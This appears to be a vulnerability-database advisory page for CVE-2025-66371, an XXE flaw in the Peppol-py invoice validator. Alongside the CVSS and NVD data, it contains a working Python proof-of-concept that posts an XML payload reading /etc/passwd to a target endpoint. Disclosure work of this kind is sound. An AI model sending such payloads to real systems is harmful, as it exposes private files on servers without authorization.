Security Vulnerability Report
中文
CVE-2025-66371 CVSS 5.0 MEDIUM

CVE-2025-66371

Published: 2025-11-28 04:16:01
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Peppol-py before 1.1.1 allows XXE attacks because of the Saxon configuration. When validating XML-based invoices, the XML parser could read files from the filesystem and expose their content to a remote host.

CVSS Details

CVSS Score
5.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Peppol-py < 1.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Malicious XML payload for XXE attack xml_payload = '''<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE invoice [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <Invoice> <UBLExtensions> <Extension>&xxe;</Extension> </UBLExtensions> <ID>XXE-TEST-001</ID> </Invoice>''' def exploit_cve_2025_66371(target_url, xml_payload): """ PoC for CVE-2025-66371: Peppol-py XXE vulnerability This PoC demonstrates how an attacker can read local files by exploiting the XXE vulnerability in Peppol-py < 1.1.1 Prerequisites: - Target must be running a service using vulnerable Peppol-py - Service must accept and validate XML-based Peppol invoices Usage: 1. Host the malicious XML on a server or send directly 2. Monitor for file contents in server responses """ headers = { 'Content-Type': 'application/xml', 'User-Agent': 'Peppol-Validator/1.0' } try: response = requests.post( target_url, data=xml_payload, headers=headers, timeout=30 ) print(f"Status: {response.status_code}") print(f"Response: {response.text}") # Check if file contents were leaked if 'root:' in response.text or 'daemon:' in response.text: print("[+] XXE Exploitation Successful - Local file content leaked!") return True else: print("[-] No file content detected in response") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False # Example usage # target_url = "http://target-server/peppol/validate" # exploit_cve_2025_66371(target_url, xml_payload)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66371", "sourceIdentifier": "[email protected]", "published": "2025-11-28T04:16:01.293", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Peppol-py before 1.1.1 allows XXE attacks because of the Saxon configuration. When validating XML-based invoices, the XML parser could read files from the filesystem and expose their content to a remote host."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-611"}]}], "references": [{"url": "https://github.com/iterasdev/peppol-py/commit/349a4bff8adb6205ea411bac8d7a06da0477abd7", "source": "[email protected]"}, {"url": "https://github.com/iterasdev/peppol-py/pull/16", "source": "[email protected]"}, {"url": "https://github.com/iterasdev/peppol-py/releases/tag/1.1.1", "source": "[email protected]"}, {"url": "https://invoice.secvuln.info", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.